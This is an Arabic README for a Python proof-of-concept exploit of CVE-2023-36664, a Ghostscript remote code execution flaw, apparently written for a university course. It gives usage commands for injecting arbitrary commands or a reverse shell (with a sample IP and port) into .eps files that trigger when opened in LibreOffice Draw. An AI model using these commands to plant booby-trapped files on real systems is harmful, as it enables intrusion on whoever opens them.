
إثبات المفهوم بلغة Python لـ CVE-2023-36664 Ghostscript RCE. يحقن حمولات أو قذائف عكسية في ملفات .eps لتشغيل تنفيذ التعليمات البرمجية عبر LibreOffice Draw.
إثبات المفهوم لـ CVE-2023-36664.
لإدخال حمولة في ملف .eps :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
لإدخال حمولة شل عكسية في ملف .eps :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
من المفترض أن يؤدي فتح الملف المحقون في Libreoffice Draw إلى تفعيل الحمولة.
تم تطوير إثبات المفهوم هذا لدورة محددة في الجامعة. تم نشره هنا فقط للاستخدام التعليمي.